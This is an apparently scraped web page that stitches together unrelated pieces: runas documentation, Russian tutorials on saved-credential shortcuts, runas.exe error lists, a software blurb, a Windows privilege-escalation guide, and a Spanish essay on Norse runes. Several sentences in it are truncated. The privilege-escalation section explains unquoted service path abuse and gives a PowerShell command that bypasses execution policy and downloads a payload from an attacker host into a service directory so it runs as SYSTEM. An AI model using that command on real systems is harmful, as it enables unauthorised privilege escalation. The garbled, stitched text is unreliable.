Андрей Смирнов
Время чтения: ~20 мин.
Просмотров: 5

Создать ярлык с запуском программы от имени другого пользователя

Parameters

Parameter

Description

/profile

Loads the user’s profile. This is the default. This parameter cannot be used with the /netonly parameter.

/no profile

Specifies that the user’s profile is not to be loaded. This allows the application to load more quickly, but it can also cause a malfunction in some applications.

/env

Specifies that the current network environment be used instead of the user’s local environment.

/netonly

Indicates that the user information specified is for remote access only. This parameter cannot be used with the /profile parameter.

/savecred

Indicates if the credentials have been previously saved by this user. This parameter is not available and will be ignored on Windows Vista Home or Windows Vista Starter Editions. This parameter cannot be used with the /smartcard parameter.

/smartcard

Indicates whether the credentials are to be supplied from a smartcard. This parameter cannot be used with the /savecred parameter.

/showtrustlevels

Displays the trust levels that can be used as arguments to /trustlevel.

/trustlevel

Specifies the level of authorization at which the application is to run. Use /showtrustlevels to see the trust levels available.

/user:<UserAccountName> «<ProgramName> <PathToProgramFile>»

Specifies the name of the user account under which to run the program, the program name, and the path to the program file. The user account name format should be <User>@<Domain> or <Domain>\<UserAccountName>.

/?

Displays help at the command prompt.

Распространенные сообщения об ошибках в Runas.exe

Наиболее распространенные ошибки runas.exe, которые могут возникнуть на компьютере под управлением Windows, перечислены ниже:

  • «Ошибка приложения Runas.exe.»
  • «Runas.exe не является приложением Win32.»
  • «Возникла ошибка в приложении Runas.exe. Приложение будет закрыто. Приносим извинения за неудобства.»
  • «Файл runas.exe не найден.»
  • «Runas.exe не найден.»
  • «Ошибка запуска программы: runas.exe.»
  • «Файл Runas.exe не запущен.»
  • «Отказ Runas.exe.»
  • «Неверный путь к приложению: runas.exe.»

Такие сообщения об ошибках EXE могут появляться в процессе установки программы, когда запущена программа, связанная с runas.exe (например, Windows), при запуске или завершении работы Windows, или даже при установке операционной системы Windows

Отслеживание момента появления ошибки runas.exe является важной информацией при устранении проблемы

Unquoted Service Paths

When a service is started Windows will search for the binary to execute. The location of the binary to be executed is declared in the attribute. If the path to the binary is unquoted, Windows does not know where the binary is located and will search in all folders, from the beginning of the path.

So, if we want to exploit this misconfiguration, three conditions have to be met:

  • The service path is unquoted;
  • The service path contains space; and
  • We have write permission in one of the intermediate folders.

If the is set to

C:\Program Files\Unquoted Path Service\Common Files\service.exe

Windows will search in this order:

  1. C:\Program.exe
  2. C:\Program Files\Unquoted.exe
  3. C:\Program Files\Unquoted Path.exe
  4. C:\Program Files\Unquoted Path Service\Common.exe
  5. C:\Program Files\Unquoted Path Service\Common Files\service.exe

Unquoted service path detected by PowerUp

Writeable Path detected by winPEAS

Create a payload with and name it control.exe. Place it in the directory.

powershell -nop -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://192.168.0.114:8080/common.exe', 'C:\Program Files\Unquoted Path Service\common.exe')"

Execute the payload by starting the service using

Why Encrypted RunAs?

When you work with computers you will soon come across software that will not work with limited user rights. Normally you would have to either add the user to the administrators or Power User group or find why the software requires administrative rights in the first place, this could be due to many reasons ie, trying to access the local machine registry, registering a DLL or OCX control etc etc.

With Encrypted RunAs installed, a shortcut to an application can be created that uses an account on the local machine that has administrator rights. Therefore only giving rights that are required for the application to run correctly and not the whole machine.

  • Encrypted RunAs creates encrypted shortcuts that point to programs that need to be run with different user credentials, so the password does not need to be given to the user. Encrypted RunAs uses >128 bit encryption for the shortcuts, the password is encrypted twice using information located on the computer/domain for extra security.
  • Unlike other programs of this type, Encrypted RunAs can also check that the original file the shortcut was created for has not been swapped with an unauthorized file (this prevents users from trying to run unauthorized programs with elevated privileges).
  • Unlike other programs of this type, Encrypted RunAs can also check that the original file the shortcut was created for has not been swapped with an unauthorized file (this prevents users from trying to run unauthorized programs with elevated privileges).
  • Most programs of this type only allow the use of .exe, .com, and .bat. Encrypted RunAs also allows the use of VBScript files (vbs), this can be used with the CRC feature to ensure that your administration scripts will not run with elevated permissions if the script is changed.
  • Checks the accounts exist on the local machine or domain before allowing the shortcut to be tested, and then saved.
  • Shortcuts can easily created on All Users Desktops and Programs Menu with Encrypted RunAs, they can also be removed using the Manage Shortcuts tool.
  • Any printers or network drives mapped to the current user are re-mapped when the Encrypted RunAs shortcut is run.

Примечания

  • Администраторам рекомендуется использовать учетную запись с ограниченными разрешениями для выполнения повседневных задач, не связанных с администрированием, и учетную запись с более широкими правами только для выполнения отдельных административных задач. Чтобы реализовать такой подход без выхода из системы и повторного входа, войдите в систему с обычной учетной записью и используйте команду runas для запуска программ, требующих более широких прав.
  • Использование команды runas не ограничено административными учетными записями, хотя именно такой способ является наиболее употребительным. Любой пользователь с несколькими учетными записями может использоватьrunas для запуска программы, консоли MMC или компонента панели управления с другими личными данными.
  • Если необходимо использовать учетную запись администратора на своем компьютере, в качестве параметра /user: введите одно из следующих значений:

    /user:учетная_запись_администратора@имя_компьютера

    /user:имя_компьютера\учетная_запись_администратора

  • Чтобы использовать данную команду в качестве администратора домена, введите одно из следующих значений параметра:

    /user:учетная_запись_администратора@имя_домена

    /user:имя_домена\учетная_запись_администратора

  • С помощью команды runas можно выполнять программы (*.exe), запускать сохраненные консоли MMC (*.msc), ярлыки программ и сохраненных консолей MMC и компоненты панели управления. Их можно запускать в качестве администратора, даже если вход в систему был произведен с учетной записью члена другой группы, например группы пользователей или опытных пользователей.
  • Можно использовать команду runas для запуска любой программы, консоли MMC или компонента панели управления. Поскольку указываются соответствующие сведения об имени пользователя и его пароле, учетная запись пользователя предоставляет возможность подключения к компьютеру, а программа, консоль MMC или компонент панели управления становятся доступными в системе для учетной записи пользователя.
  • Команда runas позволяет администрировать сервер в другом лесе (компьютер, с которого запускается программа, и сервер располагаются в разных доменах).
  • При попытке запуска программы, консоли MMC или компонента контрольной панели из сети с помощью runas выполнение может окончиться неудачей, поскольку личные сведения, использованные для подключения к сетевому ресурсу, могут отличаться от тех, что использованы при запуске программы. Личные сведения, использованные при запуске программы, могут не позволить получить доступ к тому же сетевому ресурсу.
  • Некоторые компоненты, например папка «Принтеры» и элементы рабочего стола, открываются косвенно. Эти компоненты не могут быть запущены командой runas.
  • Если выполнение команды runas заканчивается неудачей, может оказаться, что служба вторичного входа не запущена или используемая учетная запись пользователя недопустима. Чтобы проверить состояние службы вторичного входа, в компоненте «Управление компьютером» щелкните узел Службы и приложения, а затем  Службы. Чтобы проверить учетную запись пользователя, попытайтесь подключиться к соответствующему домену с помощью этой учетной записи.

Запуск программы из-под учётной записи администратора с помощью утилиты «Run As»

«Run As» – это утилита, позволяющая запустить какой-либо ярлык от имени любого пользователя, выполняется она путем добавления команды с необходимыми ключами непосредственно к ярлыку самой программы или в окне вызванного через «Win+R».

Лично я чаще всего использую добавление команды «Run As» к ярлыку с сохранением пароля после первого запуска, что позволит офисному работнику без лишних телодвижений запускать программу от имени, в данном случае, администратора.

Делается это так:

  1. На рабочем столе, на свободно месте, вызываем контекстное меню и нажимаем на «Создать» — «Ярлык».
  2. Воспользовавшись кнопкой «Обзор», через «Мой компьютер» находим ярлык необходимой программы.
  3. После чего в поле «расположения объекта» должен появится путь к Вашей программе, и тут впереди мы прописываем следующие команды «runas /user:Администратор /savecred» или если это доменный пользователь тогда нужно указать и домен «runas /user:Office\Администратор /savecred» , в результате должно получится следующее.
  4. Для того что бы было более понятно давайте объясню за что отвечает каждый ключ:
    • runas – команда, отвечающая непосредственно за запуск ярлыка от имени другого пользователя;
    • /user:… – ключ, указывающий каким именно пользователем выполнить запуск приложения;
    • /savecred – ещё один ключ, отвечающий за сохранения пароля (чуть ниже более подробно)
  5. Нажав «Далее» и указав имя ярлыка, находим его на рабочем столе и запускаем.
  6. Появится окно командной строки с запросом на ввод пароля для пользователя от имени, которого будет происходить запуск, вводим туда пароль и нажимаем «Enter», после чего программа должна запустится под указанным ранее пользователем.

В дальнейшем Вы сможете запускать этот ярлык просто двойным кликом, не указываем при этом каждый раз пароль, так как он уже был сохранен в системе как раз с помощью ключа «/savecred». Правда некоторые специалисты говорят, что это не безопасно и таким образом кто-то может навредить системе украв пароль, но, если честно пока подобных случаем у меня никогда не было.

Ну а пользователь для кого это в принципе и делалось, остался абсолютно довольным.

Кстати если у Вас уже есть готовый Ярлык нужной программы, тогда команду «Run As» можно прописать прямо в его свойствах не создавая новый.

  1. Просто вызвав контекстное меню ярлыка, откройте «Свойства».
  2. И в поле «Объект» перед указным путем к файлу пропишите «runas /user:Администратор /savecred».
  3. После чего нажав на «ОК», можете запустить программу и вводим пароль в появившемся окне.

Знаю, что существует ещё несколько способом запуска от имени другого пользователя, о которых я не упомянул, но лично на моей практике этих двух достаточно, более чем, когда сами попробуете убедитесь в этом.

Создать ярлык с запуском программы от имени другого пользователя

SMEARG

Всем известно, что для того, чтобы запустить программу от имени администратора нужно нажать на ярлык программы (или на сам файл) правой кнопкой мыши, и в появившемся контекстном меню выбрать Запуск от имени администратора. Также, ни для кого уже не секрет, что если перед тем как нажать на файле правой кнопкой мышки зажать Shift, то в контекстном меню появится пункт Запуск от имени другого пользователя.

В обоих случаях далее нужно будет ввести соответствующие учётные данные. Это хорошо работает, когда программу нужно запускать от имени другого пользователя не часто.

Если же программу приходится запускать каждый раз от имени другого пользователя, такой способ запуска становится, мягко говоря, немного неудобным.

Для того, чтобы не вводить каждый раз альтернативные учётные данные при запуске программы, можно создать особый ярлык, в котором прописать, что запускаемую по данному ярлыку программу, нужно запускать от имени другого пользователя.

Точнее ярлык создаётся самый обыкновенный, но в нём нужно кое-что изменить.

Например, мы хотим, чтобы Notepad++ всегда запускался от имени другого пользователя (не важно администратора, или нет)

  1. Создаём на рабочем столе любым способом самый обыкновенный ярлык для запуска Notepad++.
  2. Открываем свойства только что созданного ярлыка (правая кнопка мышки | Свойства).
  3. Переходим на вкладку Ярлык и в поле Объект перед тем, что там есть (перед путём в к exe-файлу) вставляем следующий текст:

runas /user:domain\user /savecred

где вместо domain\user нужно подставить имя своего пользователя (и если нужно – домена), от имени которого нужно запускать программу.

Т.е., например, для запуска Notepad++, (установленного в каталог по умолчанию) строка запуска будет иметь следующий вид:

runas /user:domain\user /savecred «C:\Program Files (x86)\Notepad++\notepad++.exe»

Сохраняем внесённые изменения (нажимаем ОК).

Теперь, при первом запуске программы, откроется окошко, в котором нужно будет ввести пароль от указанного в ярлыке пользователя (в этом окне при вводе не отображается, ни пароль, ни звёздочки). В результате программа запустится от имени указанного пользователя.

Далее, при запуске программы через этот ярлык, она всегда будет запускаться от имени этого пользователя, не спрашивая пароль.

При желании/необходимости можно создать несколько ярлыков для запуска одной и той же программы от имени разных пользователей.

Ваша оценка:

Ну что ж, я думаю вы уже заметили, что при попытке сохранения системного файла hosts (C:\Windows\System32\drivers\etc\hosts), новая операционная система ругается и не дает сохранить желаемые изменения. В этом виновато ужесточение правил безопасности, применяемое в операционных системах восьмой серии. Конечно же, в этом есть смысл, так как многие вирусы прописывают нужные им строки в данный файл, и все антивирусы уже давно в обязательном порядке проверяют этот файл на данные изменения. Но что же делать нам, обычным пользователям? Мы же хотим, например, просто отключить рекламу в Skype. Всё довольно просто: нам необходимо открыть данный файл в программе, запущенной от имени администратора. И есть несколько способов это осуществить. На всякий случай, инструкция по восстановлению файла hosts.

style=»text-align: justify;»>Инструкция

Кстати, видео инструкция доступна по этой на канале сайта!

How can it be used?

The screenshot above (Fig 1) shows how to create a encryptedrunas file, type the required details username, password, browse to the program to add it to the command line, add parameters if required, click save to save the shortcut information to an encrypted file. Fig 2 and 3 show the 2 resulting files, Fig 2 is the ERAS file and contains the encrypted data, Fig 3 is a standard windows shortcut point to the ERAS file, the icon can be changed and the shortcut move into the program files menu. This file can then be used in the following ways:

  • Double clicking the icon.
  • Running in a script in the format: ERunAs test.eras (test.eras is the encrypted file).
  • Drag the icon over the ERunAs application and release.

All roads lead to SYSTEM

Sourov GhoshFollow

Apr 18 · 7 min read

Privilege Escalation may be daunting at first but it becomes easier once you know what to look for and what to ignore. Privilege escalation always comes down to proper enumeration. This guide will mostly focus on the common privilege escalation techniques and exploiting them.

The starting point for this tutorial is an unprivileged shell on a box. For demonstration purpose, I have used to get a reverse shell from a Windows 7 x86 VM.

Enumeration

I cannot stress enough how important enumeration is. There are a lot of cheat sheets out there to extract valuable information from the systems. In this guide, I will focus on the scripts which are available and using them. Some of the popular scripts available are:

  1. winPEAS by carlospolop
  2. PowerUp by harmj0y
  3. Watson by rasta-mouse
  4. Seatbelt
  5. Powerless
  6. JAWS

In my experience, winPEAS and PowerUp are the most useful tools. PowerUp is written in PowerShell and winPEAS is written in C#. You will require .NET Framework 4.0 to run winPEAS. There is also a .bat version of winPEAS which can be used if .NET support is not present. In my case .NET 4.0 was not installed by default on the Windows 7 so I had to install it to use winPEAS. Always run more than one script for enumeration just to be safe. For example, Weak Registry vulnerability was detected by winPEAS but not by PowerUp.

Examples

The following command starts an instance of the command prompt as an administrator on the local computer:

When prompted, type the administrator account password.

The following command starts an instance of the Computer Management snap-in using a domain administrator account called contoso\domainadmin:

When prompted, type the domain administrator account password.

The following command starts an instance of Notepad (and a file named my_file.txt) using a domain administrator account called jayj in a domain called domain.contoso.com:

When prompted, type the domain administrator account password.

The following command starts an instance of a command prompt window, saved MMC console, Control Panel item, or program that will administer a server in another forest:

<Domain>\<User_Name> must be a user with sufficient permissions to administer the server. When prompted, type the account password.

Причины ошибок в файле Runas.exe

Проблемы Runas.exe могут быть отнесены к поврежденным или отсутствующим файлам, содержащим ошибки записям реестра, связанным с Runas.exe, или к вирусам / вредоносному ПО.

Более конкретно, данные ошибки runas.exe могут быть вызваны следующими причинами:

  • Поврежденные ключи реестра Windows, связанные с runas.exe / Windows.
  • Вирус или вредоносное ПО, которые повредили файл runas.exe или связанные с Windows программные файлы.
  • Другая программа злонамеренно или по ошибке удалила файлы, связанные с runas.exe.
  • Другая программа находится в конфликте с Windows и его общими файлами ссылок.
  • Поврежденная загрузка или неполная установка программного обеспечения Windows.

Устанавливаем программу без прав администратора

В сети интернет присутствует множество различного ПО, позволяющего обходить защиту и выполнять инсталляцию программы под видом обычного пользователя. Мы не рекомендуем их использовать особенно на рабочих компьютерах, так как это может нести за собой серьезные последствия. Мы же представим безопасные способы установки. Давайте рассмотрим их подробнее.

Способ 1: Выдача прав на папку с программой

Чаще всего права администратора софту требуются в том случае, когда будут проводиться действия с файлами в своей папке, например, на системном разделе жесткого диска. Владелец может предоставить полные права другим юзерам на определенные папки, что позволит выполнять дальнейшую установку под логином обычного пользователя. Делается это следующим образом:

Теперь во время установки программы вам потребуется указать папку, к которой предоставили полный доступ, и весь процесс должен пройти успешно.

Способ 2: Запуск программы с учетной записи обычного пользователя

В тех случаях когда нет возможности попросить администратора предоставить права доступа, рекомендуем воспользоваться встроенным в Windows решением. С помощью утилиты через командную строку осуществляются все действия. От вас требуется только следовать инструкции:

  1. Откройте «Выполнить» нажатием горячей клавиши Win + R. Введите в строку поиска cmd и нажмите «ОК»

В открывшемся окне введите команду, описанную ниже, где User_Name – имя пользователя, а Program_Name – название необходимой программы, и нажмите Enter.

runas /user:User_Name\administrator Program_Name.exe

Иногда может потребоваться ввод пароля учетной записи. Напишите его и нажмите Enter, после чего останется только дождаться запуска файла и выполнить установку.

Способ 3: Использование портативной версии программы

Некоторое ПО имеет портативную версию, не требующую установки. Вам будет достаточно скачать ее с официального сайта разработчика и запустить. Выполнить это можно очень просто:

Вы можете перекинуть файл софта на любое съемное устройство хранения информации и запускать его на разных компьютерах без прав администратора.

Las Runas como señales oraculares

Las runas no se crearon para predecir el futuro, ya que en la cultura en que se gestaron no se creía en la predestinación. Cuando son utilizadas por el vitki (o lector de runas), nos ayudan a conectar nuestro inconsciente para recuperar la sintonía con el cosmos y volver a sentir y vivir de forma armónica; es decir, nos ayudan a ver nuestro propios problemas e incluso nuestros propios sentimientos desde una perspectiva de crecimiento interno y autosuperación.

Los sistemas oraculares son los vehículos hacia esa comunicación primordial y han estado presentes y han guiado al hombre desde todos lo tiempos. A veces un suceso insignificante es reconocido por los expertos como una señal correcta y oportuna que guía a quien consulta en la dirección más apropiada. Consultar el oráculo comienza por el presente.

Para muchos tomar consciencia del verdadero presente es extremadamente difícil dado que la mayoría de las veces desperdiciamos gran parte de nuestras vidas en lamentar lo sucedido (el pasado) o fantasear sobre el futuro.

Nada requiere tanto trabajo como aprender a tomar consciencia de sí, ya que es más fácil ver hacia fuera, hacia los lados y hacia atrás, pero no a uno mismo, de no ser un espejo. Al igual que el Tarot, las runas pueden ser ese espejo.

¿Cuántas veces no te has descubierto a ti mismo pensando en una infinidad de cosas mientras el mundo pasa ante tus ojos sin que tú te percates de ello? ¿Cuántas veces encuentras que tu mente vuela al pasado o al futuro sin que la puedas controlar?

Lo ideal es vivir el aquí y ahora, el verdadero presente. Darse cuenta es el principio. En la vida del espíritu, estamos siempre al comienzo y no hay mejor momento que el presente, ni mejor lugar que éste para tomar el control sobre nuestra vida. A eso nos ayudan las señales y las runas pueden ser las mejores aliadas.

Las Runas: el legado de Odín

Odín, cuyo nombre significa viento y espíritu, es la divinidad principal en el panteón de los dioses nórdicos, el cabeza de familia y líder de los demás dioses. Principalmente porque logró deshacer los planes del dios Loki de llevar a cabo el Ragnarok (ocaso de los dioses, del cual hablaremos en la próxima entrega), por lo que consiguió el respeto de los demás dioses y un lugar similar al de Zeus en el Olimpo Griego.

Era un anciano fuerte de barba blanca. Llevaba dos cuervos sobre sus hombros (Hugin y Munin: pensamiento y memoria) que vigilaban el mundo cada mañana para informarle de cuanto ocurría. El dios montaba en su brioso caballo de ocho patas Sleipnir, nombre que se traduce como resbaladizo.

Este extraordinario animal simbolizaba los ocho vientos que provienen de los ocho puntos cardinales y era capaz de ir velozmente de un extremo al otro del horizonte. Además, Odín l levaba consigo una poderosa lanza llamada Gungnir, que jamás fallaba, y, desde su trono, podía observar el mundo entero.

Odín adquirió la sabiduría a cambio de uno de sus ojos y, de acuerdo a la leyenda, a través de su pasión, su sacrificio transformador, obtuvo las Runas que dejó a la humanidad.

Llevó a cabo un ritual de autosacrificio, que nos recuerda el arquetipo del Colgado del Tarot. En este caso, primero hirió su cuerpo con la punta de su propia lanza y acto seguido se ató de un pié a Yggdrasill, el fresno sagrado. Durante nueve días y nueve noches permaneció colgado sin comer ni beber.

Concluido ese lapso, fue capaz de adentrarse en las mismísimas entrañas del ser, donde vislumbró los caracteres rúnicos. Con un grito desgarrador llegó hasta el fondo y se apoderó de ellos. Con el esfuerzo, Odín perdió el conocimiento, pero logró atrapar las Runas y ellas fueron su legado para el mundo.

Рейтинг автора
5
Материал подготовил
Максим Иванов
Наш эксперт
Написано статей
129
Ссылка на основную публикацию
Похожие публикации